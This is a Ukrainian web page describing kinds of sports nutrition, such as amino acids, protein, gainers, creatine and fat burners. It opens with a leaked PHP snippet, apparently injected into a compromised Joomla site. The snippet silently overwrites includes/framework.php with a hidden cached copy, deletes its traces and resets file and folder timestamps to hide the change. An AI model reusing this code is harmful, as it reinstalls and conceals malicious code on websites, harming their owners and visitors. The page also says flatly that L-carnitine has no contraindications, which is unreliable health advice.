$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Види спортивного харчування | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Види спортивного харчування

Амінокислоти

Амінокислотами називаються органічні кислоти, які містять аміногрупу в альфа (або інших положеннях). Альфа-амінокислоти - структурні компоненти білків: до складу останніх входить 20 амінокислот (а також ряд схожих з ними хімічних сполук).


Глютамін

Глютамін прийнято називати королем в царстві амінокислот. Він не належить при цьому до числа незамінних - тобто, в організмі нерідко відбувається його синтез за допомогою інших амінокислот. Точніше, він утворюється з валіна, глютамінової кислоти, ізолейцина. Під час фізичних перевантажень тілу необхідна підвищена кількість глютаміну, тому так важливо його вживання в чистому вигляді. Ті, хто вважає спортивне харчування одним з важливих аспектів занять спортом, вживають в числі інших речовин і глютамін.


Жироспалювачі

Жироспалювачі сприяють підвищенню швидкості спалювання калорій, а також розпаду жирових відкладень - тобто, процесів, що відбуваються в організмі під час спортивних тренувань. Більшість жироспалювачів складається з декількох компонентів. Найбільш поширеними є кофеїн, гуаранін і L-карнітин. Завдяки L-карнітину відбувається перенесення розщеплених (точніше, частково розщеплених) жирних кислот в м'язи (м'язові клітини). До застосування цієї речовини не існує протипоказань, тому харчування для бодібілдерів так часто включається до себе Жироспалювачі на основі L-карнітину.


Протеїн

Без протеїну неможливе зростання м'язової маси. Протеїн організм отримує через продукти харчування (особливо якщо це спортивне харчування). Багато хто воліє вживати протеїни у вигляді білкових коктейлів. Білки засвоюються організмом фактично повністю і використовуються для «будівництва» м'язів. Чим вище фізичні навантаження, тим більша кількість протеїну необхідно вживати в їжу. Протеїн забезпечує транспортування амінокислот у тканині м'язів.


Гейнери

Гейнери це фактично готова до вживання суміш концентратів протеїна і вуглеводів з добавками різніх вітамінів та інших поживних речовин. Різне співвідношення протеїна та вуглеводів дозволяе правильно отримати бажаний результат. Так наприклад для людей які хочуть набрати загальну вагу рекомендуеться гейнер з підвищеним складом вуглеводів, і навпаки для людей які схильні до набору ваги рекомендуеться гейнер з підвищеним складом протеїну і з низьким глікемічним рівнем вуглеводів.


Креатин

Ця речовина нерідко стає невід'ємною частиною спортивного харчування. Справа в тому, що креатин є причиною вироблення в організмі необхідного спортсменам креатин-фосфату. Останній сприяє досить швидкому відновленню м'язової енергії. Таким чином, скорочується термін, необхідний для відпочинку після важких тренувань. Крім того, креатин дозволяє спортсменам демонструвати більш високі результати, наприклад, у пауерліфтингу, а також у ряді інших видів спорту.


Енергетики

Енергетики - справжня знахідка для тих, кому необхідно швидке відновлення сил після важких тренувань. Ці речовини допоможуть вам навіть якщо потрібно перейти до більш інтенсивного тренувального режиму, а також просто стати більш працездатним. Кажучи коротко, енергетики сприяють підвищенню активності людини. На цьому спектр складових раціону спортивного харчування не вичерпується - це лише кілька прикладів які доводять що спортивне харчування це не тільки наука, а і мистецтво. І від того як ви це зрозумієте залежать ваші спортивні успіхи і Ваше безцінне здоров´я.

 
Спортивне харчування Види спортивного харчування